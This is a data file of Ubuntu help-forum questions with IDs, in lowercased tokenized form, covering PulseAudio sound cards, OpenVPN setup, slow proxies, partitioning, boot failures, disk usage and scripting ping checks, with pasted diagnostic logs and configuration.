413318	soundcards are not detected in kubuntu only dummy output shows up in phonon	it seems that , in kde , no sound cards will be recognized . the onboard card does not work . but at least additional sound card ought to work : i 've tried two different cards and they both are known to work , and do indeed work in a live environment , but something has gone wrong with pulseaudio ... in phonon , there are no cards listed except for `` dummy output '' , and there is no sound . here are some outputs ( after commenting out ; daemonize = no in /etc/pulse/daemon.conf ) : pulseaudio -vvvv richie @ richie-desktop : ~ $ pulseaudio -vvvv i : [ pulseaudio ] main.c : setrlimit ( rlimit_nice , ( 31 , 31 ) ) failed : operation not permitted i : [ pulseaudio ] main.c : setrlimit ( rlimit_rtprio , ( 9 , 9 ) ) failed : operation not permitted d : [ pulseaudio ] core-rtclock.c : timer slack is set to 50 us . d : [ pulseaudio ] core-util.c : realtimekit worked . i : [ pulseaudio ] core-util.c : successfully gained nice level -11 . i : [ pulseaudio ] main.c : this is pulseaudio 4.0 d : [ pulseaudio ] main.c : compilation host : x86_64-pc-linux-gnu d : [ pulseaudio ] main.c : compilation cflags : -g -o2 -fstack-protector -- param=ssp-buffer-size=4 -wformat -werror=format-security -wall -w -wextra -pipe -wno-long-long -wno-overlength-strings -wunsafe-loop-optimizations -wundef -wformat=2 -wlogical-op -wsign-compare -wformat-security -wmissing-include-dirs -wformat-nonliteral -wpointer-arith -winit-self -wdeclaration-after-statement -wfloat-equal -wmissing-prototypes -wredundant-decls -wmissing-declarations -wmissing-noreturn -wshadow -wendif-labels -wcast-align -wstrict-aliasing -wwrite-strings -wno-unused-parameter -ffast-math -wp , -d_fortify_source=2 -fno-common -fdiagnostics-show-option d : [ pulseaudio ] main.c : running on host : linux x86_64 3.11.0-15-generic # 25-ubuntu smp thu jan 30 17:22:01 utc 2014 d : [ pulseaudio ] main.c : found 2 cpus . i : [ pulseaudio ] main.c : page size is 4096 bytes d : [ pulseaudio ] main.c : compiled with valgrind support : no d : [ pulseaudio ] main.c : running in valgrind mode : no d : [ pulseaudio ] main.c : running in vm : no d : [ pulseaudio ] main.c : optimized build : yes d : [ pulseaudio ] main.c : fastpath defined , only fast path asserts disabled . i : [ pulseaudio ] main.c : machine id is fb1f7a50fa35f51686a94d09522640ea . i : [ pulseaudio ] main.c : session id is c1 . i : [ pulseaudio ] main.c : using runtime directory /run/user/1000/pulse . i : [ pulseaudio ] main.c : using state directory /home/richie/.config/pulse . i : [ pulseaudio ] main.c : using modules directory /usr/lib/pulse-4.0/modules . i : [ pulseaudio ] main.c : running in system mode : no e : [ pulseaudio ] pid.c : daemon already running . e : [ pulseaudio ] main.c : pa_pid_file_create ( ) failed . richie @ richie-desktop : ~ $ amixer simple mixer control 'iec958',0 capabilities : pswitch pswitch-joined playback channels : mono mono : playback [ off ] pacmd richie @ richie-desktop : ~ $ pacmd list welcome to pulseaudio ! use `` help '' for usage information . > > > memory blocks currently allocated : 1 , size : 63.9 kib . memory blocks allocated during the whole lifetime : 1 , size : 63.9 kib . memory blocks imported from other processes : 0 , size : 0 b . memory blocks exported to other processes : 0 , size : 0 b . total sample cache size : 0 b . default sample spec : s16le 2ch 44100hz default channel map : front-left , front-right default sink name : auto_null default source name : auto_null.monitor memory blocks of type pool : 1 allocated/1 accumulated . memory blocks of type pool_external : 0 allocated/0 accumulated . memory blocks of type appended : 0 allocated/0 accumulated . memory blocks of type user : 0 allocated/0 accumulated . memory blocks of type fixed : 0 allocated/0 accumulated . memory blocks of type imported : 0 allocated/0 accumulated . 19 module ( s ) loaded . index : 0 name : < module-device-restore > argument : < > used : -1 load once : yes properties : module.author = `` lennart poettering '' module.description = `` automatically restore the volume/mute state of devices '' module.version = `` 4.0 '' index : 1 name : < module-stream-restore > argument : < > used : -1 load once : yes properties : module.author = `` lennart poettering '' module.description = `` automatically restore the volume/mute/device state of streams '' module.version = `` 4.0 '' index : 2 name : < module-card-restore > argument : < > used : -1 load once : yes properties : module.author = `` lennart poettering '' module.description = `` automatically restore profile of cards '' module.version = `` 4.0 '' index : 3 name : < module-augment-properties > argument : < > used : -1 load once : yes properties : module.author = `` lennart poettering '' module.description = `` augment the property sets of streams with additional static information '' module.version = `` 4.0 '' index : 4 name : < module-switch-on-port-available > argument : < > used : -1 load once : no properties : index : 5 name : < module-bluetooth-policy > argument : < > used : -1 load once : yes properties : module.author = `` frăšdăšric dalleau '' module.description = `` when a bluetooth sink or source is added , load module-loopback '' module.version = `` 4.0 '' index : 6 name : < module-bluetooth-discover > argument : < > used : -1 load once : yes properties : module.author = `` joao paulo rechi vita '' module.description = `` detect available bluetooth audio devices and load bluetooth audio drivers '' module.version = `` 4.0 '' index : 7 name : < module-native-protocol-unix > argument : < > used : -1 load once : no properties : module.author = `` lennart poettering '' module.description = `` native protocol ( unix sockets ) '' module.version = `` 4.0 '' index : 8 name : < module-default-device-restore > argument : < > used : -1 load once : yes properties : module.author = `` lennart poettering '' module.description = `` automatically restore the default sink and source '' module.version = `` 4.0 '' index : 9 name : < module-rescue-streams > argument : < > used : -1 load once : yes properties : module.author = `` lennart poettering '' module.description = `` when a sink/source is removed , try to move their streams to the default sink/source '' module.version = `` 4.0 '' index : 10 name : < module-null-sink > argument : < sink_name=auto_null sink_properties='device.description= '' dummy output '' ' > used : 0 load once : no properties : module.author = `` lennart poettering '' module.description = `` clocked null sink '' module.version = `` 4.0 '' index : 11 name : < module-always-sink > argument : < > used : -1 load once : yes properties : module.author = `` colin guthrie '' module.description = `` always keeps at least one sink loaded even if it 's a null one '' module.version = `` 4.0 '' index : 12 name : < module-intended-roles > argument : < > used : -1 load once : yes properties : module.author = `` lennart poettering '' module.description = `` automatically set device of streams based of intended roles of devices '' module.version = `` 4.0 '' index : 13 name : < module-suspend-on-idle > argument : < > used : -1 load once : yes properties : module.author = `` lennart poettering '' module.description = `` when a sink/source is idle for too long , suspend it '' module.version = `` 4.0 '' index : 14 name : < module-systemd-login > argument : < > used : -1 load once : yes properties : module.author = `` lennart poettering '' module.description = `` create a client for each login session of this user '' module.version = `` 4.0 '' index : 15 name : < module-position-event-sounds > argument : < > used : -1 load once : yes properties : module.author = `` lennart poettering '' module.description = `` position event sounds between l and r depending on the position on screen of the widget triggering them . '' module.version = `` 4.0 '' index : 16 name : < module-filter-heuristics > argument : < > used : -1 load once : yes properties : module.author = `` colin guthrie '' module.description = `` detect when various filters are desirable '' module.version = `` 4.0 '' index : 17 name : < module-filter-apply > argument : < > used : -1 load once : yes properties : module.author = `` colin guthrie '' module.description = `` load filter sinks automatically when needed '' module.version = `` 4.0 '' index : 18 name : < module-cli-protocol-unix > argument : < > used : -1 load once : no properties : module.author = `` lennart poettering '' module.description = `` command line interface protocol ( unix sockets ) '' module.version = `` 4.0 '' 1 sink ( s ) available . * index : 0 name : < auto_null > driver : < module-null-sink.c > flags : decibel_volume latency dynamic_latency state : suspended suspend cause : idle priority : 1000 volume : 0 : 3 % 1 : 3 % 0 : -87.39 db 1 : -87.39 db balance 0.00 base volume : 100 % 0.00 db volume steps : 65537 muted : no current latency : 0.00 ms max request : 344 kib max rewind : 344 kib monitor source : 0 sample spec : s16le 2ch 44100hz channel map : front-left , front-right stereo used by : 0 linked by : 0 configured latency : 0.00 ms ; range is 0.50 .. 2000.00 ms module : 10 properties : device.description = `` dummy output '' device.class = `` abstract '' device.icon_name = `` audio-card '' 1 source ( s ) available . * index : 0 name : < auto_null.monitor > driver : < module-null-sink.c > flags : decibel_volume latency dynamic_latency state : suspended suspend cause : idle priority : 1000 volume : 0 : 100 % 1 : 100 % 0 : 0.00 db 1 : 0.00 db balance 0.00 base volume : 100 % 0.00 db volume steps : 65537 muted : no current latency : 0.00 ms max rewind : 344 kib sample spec : s16le 2ch 44100hz channel map : front-left , front-right stereo used by : 0 linked by : 0 configured latency : 0.00 ms ; range is 0.50 .. 2000.00 ms monitor_of : 0 module : 10 properties : device.description = `` monitor of dummy output '' device.class = `` monitor '' device.icon_name = `` audio-input-microphone '' 4 client ( s ) logged in . index : 0 driver : < module-systemd-login.c > owner module : 14 properties : application.name = `` login session c1 '' systemd-login.session = `` c1 '' index : 1 driver : < protocol-native.c > owner module : 7 properties : application.name = `` kmix '' native-protocol.peer = `` unix socket client '' native-protocol.version = `` 28 '' application.process.id = `` 1876 '' application.process.user = `` richie '' application.process.host = `` richie-desktop '' application.process.binary = `` kmix '' application.language = `` en_us.utf-8 '' window.x11.display = `` :0 '' application.process.machine_id = `` fb1f7a50fa35f51686a94d09522640ea '' application.process.session_id = `` c1 '' application.icon_name = `` kmix '' index : 2 driver : < protocol-native.c > owner module : 7 properties : application.name = `` kmix '' native-protocol.peer = `` unix socket client '' native-protocol.version = `` 28 '' application.process.id = `` 1504 '' application.process.user = `` richie '' application.process.host = `` richie-desktop '' application.process.binary = `` kdeinit4 '' application.language = `` en_us.utf-8 '' window.x11.display = `` :0 '' application.process.machine_id = `` fb1f7a50fa35f51686a94d09522640ea '' application.process.session_id = `` c1 '' index : 3 driver : < cli.c > owner module : 18 properties : application.name = `` unix socket client '' 0 card ( s ) available . 0 sink input ( s ) available . 0 source outputs ( s ) available . 0 cache entrie ( s ) available . cat /etc/pulse/default.pa > > > richie @ richie-desktop : ~ $ cat /etc/pulse/default.pa # ! /usr/bin/pulseaudio -nf # # this file is part of pulseaudio . # # pulseaudio is free software ; you can redistribute it and/or modify it # under the terms of the gnu lesser general public license as published by # the free software foundation ; either version 2 of the license , or # ( at your option ) any later version . # # pulseaudio is distributed in the hope that it will be useful , but # without any warranty ; without even the implied warranty of # merchantability or fitness for a particular purpose . see the gnu # general public license for more details . # # you should have received a copy of the gnu lesser general public license # along with pulseaudio ; if not , write to the free software foundation , # inc. , 59 temple place , suite 330 , boston , ma 02111-1307 usa . # this startup script is used only if pulseaudio is started per-user # ( i.e . not in system mode ) .nofail # # # load something into the sample cache # load-sample-lazy x11-bell /usr/share/sounds/gtk-events/activate.wav # load-sample-lazy pulse-hotplug /usr/share/sounds/startup3.wav # load-sample-lazy pulse-coldplug /usr/share/sounds/startup3.wav # load-sample-lazy pulse-access /usr/share/sounds/generic.wav .fail # # # automatically restore the volume of streams and devices load-module module-device-restore load-module module-stream-restore load-module module-card-restore # # # automatically augment property information from .desktop files # # # stored in /usr/share/application load-module module-augment-properties # # # should be after module-*-restore but before module-*-detect load-module module-switch-on-port-available # # # load audio drivers statically # # # ( it 's probably better to not load these drivers manually , but instead # # # use module-udev-detect -- see below -- for doing this automatically ) # load-module module-alsa-sink # load-module module-alsa-source device=hw:1,0 # load-module module-oss device= '' /dev/dsp '' sink_name=output source_name=input # load-module module-oss-mmap device= '' /dev/dsp '' sink_name=output source_name=input # load-module module-null-sink # load-module module-pipe-sink # # # automatically load driver modules depending on the hardware available .ifexists module-udev-detect.so # load-module module-udev-detect tsched=0 .else # # # use the static hardware detection module ( for systems that lack udev support ) load-module module-detect .endif .ifexists module-android-audio-hal.so load-module module-android-audio-hal .endif # # # automatically connect sink and source if jack server is present .ifexists module-jackdbus-detect.so .nofail load-module module-jackdbus-detect channels=2 .fail .endif # # # automatically load driver modules for bluetooth hardware .ifexists module-bluetooth-policy.so load-module module-bluetooth-policy .endif .ifexists module-bluetooth-discover.so load-module module-bluetooth-discover .endif # # # load several protocols .ifexists module-esound-protocol-unix.so load-module module-esound-protocol-unix .endif load-module module-native-protocol-unix # # # network access ( may be configured with paprefs , so leave this commented # # # here if you plan to use paprefs ) # load-module module-esound-protocol-tcp # load-module module-native-protocol-tcp # load-module module-zeroconf-publish # # # load the rtp receiver module ( also configured via paprefs , see above ) # load-module module-rtp-recv # # # load the rtp sender module ( also configured via paprefs , see above ) # load-module module-null-sink sink_name=rtp format=s16be channels=2 rate=44100 sink_properties= '' device.description='rtp multicast sink ' '' # load-module module-rtp-send source=rtp.monitor # # # load additional modules from gconf settings . this can be configured with the paprefs tool . # # # please keep in mind that the modules configured by paprefs might conflict with manually # # # loaded modules . .ifexists module-gconf.so .nofail load-module module-gconf .fail .endif # # # automatically restore the default sink/source when changed by the user # # # during runtime # # # note : this should be loaded as early as possible so that subsequent modules # # # that look up the default sink/source get the right value load-module module-default-device-restore # # # automatically move streams to the default sink if the sink they are # # # connected to dies , similar for sources load-module module-rescue-streams # # # make sure we always have a sink around , even if it is a null sink . load-module module-always-sink # # # honour intended role device property load-module module-intended-roles # # # automatically suspend sinks/sources that become idle for too long load-module module-suspend-on-idle # # # if autoexit on idle is enabled we want to make sure we only quit # # # when no local session needs us anymore . .ifexists module-console-kit.so load-module module-console-kit .endif .ifexists module-systemd-login.so load-module module-systemd-login .endif # # # enable positioned event sounds load-module module-position-event-sounds # # # cork music/video streams when a phone stream is active # load-module module-role-cork # # # modules to allow autoloading of filters ( such as echo cancellation ) # # # on demand . module-filter-heuristics tries to determine what filters # # # make sense , and module-filter-apply does the heavy-lifting of # # # loading modules and rerouting streams . load-module module-filter-heuristics load-module module-filter-apply # x11 modules should not be started from default.pa so that one daemon # can be shared by multiple sessions . # # # load x11 bell module # load-module module-x11-bell sample=bell-windowing-system # # # register ourselves in the x11 session manager # load-module module-x11-xsmp # # # publish connection data in the x11 root window # .ifexists module-x11-publish.so # .nofail # load-module module-x11-publish # .fail # .endif # # # make some devices default # set-default-sink output # set-default-source input on the alsa side of things , every sound card , including the onboard one , hdmi , and extra ones added in , works . does anyone have an idea what 's wrong with pulseaudio ? is there any way to get it to run properly and make sound work ?
413321	problems configuring openvpn server	i 'm trying to set up openvpn server . i 'm following the setup guide found here . everything works fine until i execute the source vars command . while i do n't get an error , when i execute ./clean-all . i am told that need to run source vars . i ca n't seem to get past this issue and ca n't continue until i do .
413322	how to fix very slow network access through proxy after upgrading to 12.04	i 'm running a lab that sits behind a proxy server . we have been using ubuntu 10.04.4 , and getting reasonable internet transfer rates . i 'd like to upgrade to 12.04 , but when i test it , attempts to connect to any site past the proxy take many minutes if they connect at all . loading a home page routinely takes 30 minutes . it is getting an ip address from the dhcp server here in the lab , which is also the gateway . i can ping other machines in the lab . if i connect this same machine to an unproxied connection it works fine . if i install 10.04 on this same machine , it works fine . using 12.04 ( and 13.04 , btw ) on several other machines also does n't work this problem exists whether i use a web site hostname , or an ip address . it happens on ftp as well as http . things i 've tried : upgraded bios firmware ( dell optiplex 745 v2.6.6 ) built and installed newer tg3 nic driver ( 3.133d ) restarted the proxy disabled dnsmasq set static ip address/gateway added resolv.conf ips to /etc/hosts file ( to fix reports of nslookup failing ) can anybody suggest how i can fix this , or at least begin to diagnose what the point of failure in this setup might be ?
413323	is `sudo chown -r $ user $ home` safe ?	are there any files , like in ~/.config or elsewhere , in the home directory that should be owned by root ? will recursively changing the ownership of every file in my user 's ~ to be my user be harmful ?
413326	how to un-ubuntu a flashdrive	i recently fixed my friends computer , and installed ubuntu 13.10 on to it . to do this , i used my flash-drive ( he had no disc reader ) . however , now i want to undo what i did to the flash drive . i created the drive on mac osx following the official websites instructions to create the flash drive . i have already formatted the drive in windows , but now it 's only 2.7 mb big . how can i un-ubuntu the drive ? i 'd really like to not have to buy a new one . edit : instructions on how to do this on either os ( mac or windows ) are good . i do n't have access to the ubuntu machine any longer . ( sadface again )
413327	ubuntu 13.10 wo n't allow me to change file permissions . fresh install	i just freshly installed ubuntu 13.10 and made myself an admin account . i had a problem with closing my laptop and the system suspending so i went into change the /etc/systemd/logind.conf to change the line to ignore it but when i tried the file was `` read-only , '' the file would not allow me to mess with it . i immediately went into properties to change permissions and it said `` you are not the owner . so you can not change these permissions . '' it says this for system files and folders not just this one specifically . any help would be greatly appreciated .
413328	no keyboard layouts are installed on ubuntu 12.04	hello i just installed an ubuntu12.04 64 bit system . i am using gnome classic but i do n't think this is related to my problem . the problem is that during the installation ( or just after i do n't remember ) i was informed by the installer that some packets where not able to be installed . i just ignored it . the problem is that i had selected greek for keyboard layout so when i tried to change the input method nothing happened . i went to keyboard preferences- > input method and it seems that i can not add anything ( add button is disabled ) only thing i can select is input method to be chinese or something , but i can not add a layout ... .
413332	can not stream video via library freegal movies	my local library offers free movie streaming via freegalmovies.com it 's a flash-based stream , but for the life of me , i can not get my ubuntu 12.04 laptop to play any movies . other flash sites work fine . youtube , vimeo , et al . any ideas ?
413334	ca n't partition my hard drive for ubuntu	i installed ubuntu just yesterday , but i had to install it to just 6gb the os taking up around 3gb i think , but i have about 260gb free on my one and only hard drive . how can i utilize that space for ubuntu ? i have it set to dual boot , my other os being windows . i 've managed to split 50gb off of that , and it comes up as `` unallocated space '' , but when i try to either create `` a new simple volume '' from that it tells me that the drive already has the maximum number of partitions on it . when i try to extend the 6gb partition ubuntu is on now , the option is grayed out ( i 'm doing this via control panel on windows under disk management or create and format drive partitions or something like that ) . on ubuntu , the 50gbs comes up as `` unusable space '' . i also ca n't delete any partitions , other than extend the 50gb one back to the original windows os partition , another is a recovery partition , and there 's 2 more of about 100mb each . i want ubuntu really bad , and if i ca n't fix this i 'm going to have to buy an external hard drive . i 'm running ubuntu 13.10 , 64-bit , core i3 , etc .
413335	ubuntu 13.10 desktop and rhythmbox	ubuntu newbie just installing 13.10 desktop . does the version of rhythmbox included with 13.10 natively support dlna such that i can send music to my whole-house receiver . if not natively , is there a way to make it do so ? thank you very much . ken traynham
413336	system no longer boots after 12.04 to 12.10 upgrade	i recently upgraded my system from 12.04lts to 12.10 , and now it no longer boots . i got the following messages over and over again : error : font file format error : 1st section must be file error : no suitable mode found error : no video mode activated i have no idea what to do to correct this other than a clean install
413337	folder deleted on mounted drive	i have a fresh install of ubuntu 12.04 server 64 bit . i installed dropbox on the machine and pointed the folder to a mounted hdd at /media/data the dropbox folder was /media/data/dropbox this morning i restarted the machine and the dropbox folder with its files was gone . the drive was still mounted . what i am trying to find out now is what happened to the dropbox folder and files ?
413338	why is my syslog telling me that my bios is broken ?	i found this in my syslog file , what can i do to fix it ? or is it even worth fixing ? everything seems to be working correctly . running 3.12.9-031209-generic . warning : cpu : 0 pid : 0 at /home/apw/cod/linux/drivers/iommu/dmar.c:488 warn_invalid_dmar+0x8f/0xa0 ( ) your bios is broken ; dmar reported at address 0 ! bios vendor : american megatrends inc. ; ver : f5 ; product version : to be filled by o.e.m . modules linked in : cpu : 0 pid : 0 comm : swapper not tainted 3.12.9-031209-generic # 201401251255 hardware name : gigabyte technology co. , ltd. z87mx-d3h/z87mx-d3h-cf , bios f5 08/02/2013 00000000000001e8 ffffffff81c01d98 ffffffff817433c6 00000000000017e0 ffffffff81c01de8 ffffffff81c01dd8 ffffffff810678ac ffffffff81c01e28 ffffffff81fd201c ffffffff81fd2058 ffffffff81dda2e0 ffff88022f5aad00 call trace : [ < ffffffff817433c6 > ] dump_stack+0x46/0x58 [ < ffffffff810678ac > ] warn_slowpath_common+0x8c/0xc0 [ < ffffffff8106793f > ] warn_slowpath_fmt_taint+0x3f/0x50 [ < ffffffff8172dfbb > ] ? acpi_os_map_memory+0x27/0x150 [ < ffffffff816124af > ] warn_invalid_dmar+0x8f/0xa0 [ < ffffffff81d84944 > ] check_zero_address+0x57/0xf7 [ < ffffffff81d849fb > ] detect_intel_iommu+0x17/0xb8 [ < ffffffff81d3a0db > ] pci_iommu_alloc+0x44/0x6e [ < ffffffff81d49a5c > ] mem_init+0x11/0xa2 [ < ffffffff81d2fcfa > ] start_kernel+0x1de/0x41e [ < ffffffff81d2f9ae > ] ? do_early_param+0x87/0x87 [ < ffffffff81d2f120 > ] ? early_idt_handlers+0x120/0x120 [ < ffffffff81d2f5e8 > ] x86_64_start_reservations+0x2a/0x2c [ < ffffffff81d2f6f2 > ] x86_64_start_kernel+0x108/0x117 -- - [ end trace 11d0aeb7d970f0a3 ] -- -
413339	how to reboot automatically and run terminal command ( s ) on startup ?	so i run a minecraft server on ubuntu desktop 12.04 . it runs very well except every so often the computer does need a reboot , as it should considering it runs 24/7 . i 'm relatively new to ubuntu still so obviously i do n't know how to do all the fancy ( or even simple ) things possible with ubuntu . how would i set the computer to automatically reboot itself every so often , like once every two days or so ? and then of course i would have to start the minecraft server again so how would i run commands as well ? can i set it to run a .sh on startup ? oh , and if there 's any way to run a terminal command before shutting down and restarting ( like /stop for the server ) how would i do so if this is possible ?
413340	see the version of bash in the prompt	when i open the terminal on the console i have user @ sytem-product-name : - $ and at work when ever i type bash i get bash 3.2 $ : ( or something very similar , note i 'm using putty on other unix distro ) for commodity reasons ( space ) . i would like to see bash 4.2 $ in my terminal . i 've installed it and made the ./configure make sudo make install on the directory i 've extracted bash but ca n't seem to make the version appear on my console . any help will be appreciated .
413341	my sound is n't working	i was watching youtube and the sound went out . my sound is not on mute .
413343	ruby 's ri not working - 'marshall data too short '	i 'm running lubuntu 13.10 , i installed ruby ( 1.9.3p194 ) , gems ( 1.8.23 ) , ri ( 4.1.1 ) , rdoc and some gems ( rails , rspec , haml ... ) from the apt-get repository . when i try to run ri , it gives me the following message : $ ri array /var/lib/gems/1.9.1/gems/rdoc-4.1.1/lib/rdoc/store.rb:548 : in `load ' : marshal data too short ( argumenterror ) from /var/lib/gems/1.9.1/gems/rdoc-4.1.1/lib/rdoc/store.rb:548 : in `block in load_cache' from /var/lib/gems/1.9.1/gems/rdoc-4.1.1/lib/rdoc/store.rb:547 : in `open' from /var/lib/gems/1.9.1/gems/rdoc-4.1.1/lib/rdoc/store.rb:547 : in `load_cache' from /var/lib/gems/1.9.1/gems/rdoc-4.1.1/lib/rdoc/ri/driver.rb:391 : in `block in initialize' from /var/lib/gems/1.9.1/gems/rdoc-4.1.1/lib/rdoc/ri/paths.rb:59 : in `block in each' from /var/lib/gems/1.9.1/gems/rdoc-4.1.1/lib/rdoc/ri/paths.rb:58 : in `each' from /var/lib/gems/1.9.1/gems/rdoc-4.1.1/lib/rdoc/ri/paths.rb:58 : in `each' from /var/lib/gems/1.9.1/gems/rdoc-4.1.1/lib/rdoc/ri/driver.rb:385 : in `initialize' from /var/lib/gems/1.9.1/gems/rdoc-4.1.1/lib/rdoc/ri/driver.rb:362 : in `new' from /var/lib/gems/1.9.1/gems/rdoc-4.1.1/lib/rdoc/ri/driver.rb:362 : in `run' from /var/lib/gems/1.9.1/gems/rdoc-4.1.1/bin/ri:12 : in ` < top ( required ) > ' from /usr/local/bin/ri:23 : in `load' from /usr/local/bin/ri:23 : in ` < main > 'hri array /var/lib/gems/1.9.1/gems/rdoc-4.1.1/lib/rdoc/store.rb:548 : in `load ' : marshal data too short ( argumenterror ) from /var/lib/gems/1.9.1/gems/rdoc-4.1.1/lib/rdoc/store.rb:548 : in `block in load_cache' from /var/lib/gems/1.9.1/gems/rdoc-4.1.1/lib/rdoc/store.rb:547 : in `open' from /var/lib/gems/1.9.1/gems/rdoc-4.1.1/lib/rdoc/store.rb:547 : in `load_cache' from /var/lib/gems/1.9.1/gems/rdoc-4.1.1/lib/rdoc/ri/driver.rb:391 : in `block in initialize' from /var/lib/gems/1.9.1/gems/rdoc-4.1.1/lib/rdoc/ri/paths.rb:59 : in `block in each' from /var/lib/gems/1.9.1/gems/rdoc-4.1.1/lib/rdoc/ri/paths.rb:58 : in `each' from /var/lib/gems/1.9.1/gems/rdoc-4.1.1/lib/rdoc/ri/paths.rb:58 : in `each' from /var/lib/gems/1.9.1/gems/rdoc-4.1.1/lib/rdoc/ri/driver.rb:385 : in `initialize' from /var/lib/gems/1.9.1/gems/rdoc-4.1.1/lib/rdoc/ri/driver.rb:362 : in `new' from /var/lib/gems/1.9.1/gems/rdoc-4.1.1/lib/rdoc/ri/driver.rb:362 : in `run' from /var/lib/gems/1.9.1/gems/rdoc-4.1.1/bin/ri:12 : in ` < top ( required ) > ' from /usr/local/bin/ri:23 : in `load' from /usr/local/bin/ri:23 : in ` < main > ' i have n't really found anything useful on google . q : how can i fix this , or how can i correctly install ruby and the ri gem on lubuntu 13.10 ?
413345	can not open adobe reader	i have installed adobe reader a few times , but it will not open on its own when clicked , nor can i open it when i download a file and open with adobe reader . nothing happens , not even an error message . this thread seems to have the answer : can not open adobe reader on ubuntu 12.10 64bits however , when i try to download ia32-libs i get the following error message : this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . how can i figure out what software packages i need to download first ? or is there another way to do this ? i have already installed libxml2 .
413356	after installing gnome desktop , desktop disappeared	i need your help in order to get out of a mess i 've got in . after installing successfully ubuntu 13.10 , i wanted to install some missing codecs in order to open mp3 and mp4 files . i found the solution in a website page which as well was explaining how to change the desktop interface installing gnome desktop . i should have never done it . i have neither experience nor skills in dealing with operative systems . i entered this command line : sudo apt-get install gnome-shell ubuntu-gnome-desktop consequently , the background changed to black ( dark grey ) and icons disappeared . i have no clues about how to get rid of this gnome and restore unity which served me so well in at least three happy years of using ubuntu without issues . sorry for my broken english . i hope you could help me , and i beg you not to scold me too much for my imprudence . thanks a lot alberto costa
413358	disk is full , but can not find big files or folders	ubuntu server shows me that i use allmost all disk : usage of / : 95.5 % of 118.12gb and i try to find big folders and files , run ncdu : ncdu 1.8 ~ use the arrow keys to navigate , press ? for help -- - / -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 5.5gib [ # # # # # # # # # # ] /root 2.3gib [ # # # # ] /var 628.6mib [ # ] /usr 209.9mib [ ] /lib 28.2mib [ ] /boot 8.6mib [ ] /bin 7.7mib [ ] /sbin 6.6mib [ ] /etc 208.0kib [ ] /run 112.0kib [ ] /tmp 48.0kib [ ] /opt e 16.0kib [ ] /lost+found 8.0kib [ ] /dev 8.0kib [ ] /media 4.0kib [ ] /lib64 e 4.0kib [ ] /srv e 4.0kib [ ] /selinux e 4.0kib [ ] /mnt e 4.0kib [ ] /home 0.0 b [ ] /proc 0.0 b [ ] /sys @ 0.0 b [ ] initrd.img @ 0.0 b [ ] vmlinuz according to ncdu i use about 10 gib of 128 gib - it is about 10 % . contradiction . how to clean my ubutntu server without rebooting ? i thought that ncdu lies and used another apps to find big files and folders . all of them shows the same result as ncdu . and df -h command shows that disk is full . # df -h filesystem size used avail use % mounted on /dev/xvda 119g 113g 0 100 % / udev 2.0g 8.0k 2.0g 1 % /dev tmpfs 788m 212k 788m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 2.0g 0 2.0g 0 % /run/shm update sudo du -sch /* result : / # sudo du -sch /* 8.7m /bin 29m /boot 8.0k /dev 6.6m /etc 4.0k /home 0 /initrd.img 210m /lib 4.0k /lib64 16k /lost+found 8.0k /media 4.0k /mnt 48k /opt du : can not access `/proc/4470/task/4470/fd/4 ' : no such file or directory du : can not access `/proc/4470/task/4470/fdinfo/4 ' : no such file or directory du : can not access `/proc/4470/fd/4 ' : no such file or directory du : can not access `/proc/4470/fdinfo/4 ' : no such file or directory 0 /proc 5.0g /root 212k /run 7.8m /sbin 4.0k /selinux 4.0k /srv 0 /sys 112k /tmp 629m /usr 2.3g /var 0 /vmlinuz 8.1g total 8.1g total as usual . but i see can not access rows , maybe problem because of them . then i checked the biggest folder in / . it is /root : / # sudo du -sch /root/* 96k /root/downloads 2.5g /root/dropbox 36k /root/nohup.out 4.0k /root/npm-debug.log 4.0k /root/readonly 980k /root/redis-2.6.16.tar.gz 228m /root/tmp 2.7g total
413360	ubuntu as guest in virtualbox at host with high dpi screen	i was wondering , i like the fullscreen mode ( host + f by default ) , but this is unfortunately not very helpful with a 3200x1800 resolution screen ( 15 inches ) . the scaling mode ( host + c ) is better , but not quite the same . what i want is something like fullscreen scaling , where you can set a maximum resolution , beyond that it scales to fit the screen . ( at least i think i want something like this . ) if i had to pick a static resolution then that 's ok too . ( say i 'd like to pick 1920x1080 for my 3200x1800 display ) , and then have this resolution stretched / scaled to fullscreen coverage . but how would i go about this ? i hear there 's the same kind of issue for others with retina displays where the dpi is so high that all of ubuntu 's icons / buttons and ui in general becomes too small for comfort . i feel that until ubuntu officially supports high dpi screens , then scaling it from a virtualbox image must be achievable right ? last point ... this might be an issue with the vbox additions driver auto adjusting the size of the ubuntu window to match that of the host ... i 've tried oracle vm virtualbox manager - > file - > preferences - > display - > maximum guest screen size . which seemed like it was exactly what i wanted , but it did not do anything . tl ; dr : high dpi screen on host , ubuntu guest tries to match this = tiny ui & icons . any help would be much appreciated ! ( the end result is to just want to use ubuntu on a high dpi screen , the path taken does not matter as much . however it seems like i would have most success through virtualbox here )
413363	removing dual boot and installing ubuntu 12.04.3	i had the dual boot : windows 7 and ubuntu 12.04.2 . then i tried to install ubuntu 12.04.2 on the entire hard disk . the trouble is that as the installation begin , it is n't going beyond copying the files . that is , it stuck at the point where it ask for naming the system . i then downloaded ubuntu 12.04.3 , and tried to install from it . but again , it is n't going beyond this point . please help me out . it has been a week trying whatever i could and now i 'm too tired ... ! !
413365	fingerprint scanner driver toshiba x205-s9800	help with fingerprint scanner driver or utility for toshiba x205-s9800 . to get it working would be awesome .
413366	wired connection does n't work	i just installed ubuntu but i ca n't connect to internet . i tried the automatic dhcp ( which it has always worked to me ) , i tried the manual and the wireless but nothing is working . i have dual bot with windows that has no problem to connect . also i installed ubuntu few months ago and it was working with no problem so i 'm not sure what has changed . i also tried the debian and linux mint live just to check but i have the same problem . i tried to ask help in irc but not sure what else to do when i used the manual setup i get the ip and eth0 seams to work but i ca n't receive any data , if i try to ping 192.168.x.x it says that it is unreacheable any advice ?
413367	ping multiple ip 's using bash ?	i have 10 ip numbers which i have to ping daily for checking , how i can do that by using bash script . so that i can automate that task by using cron . i want bash script only . thank you .
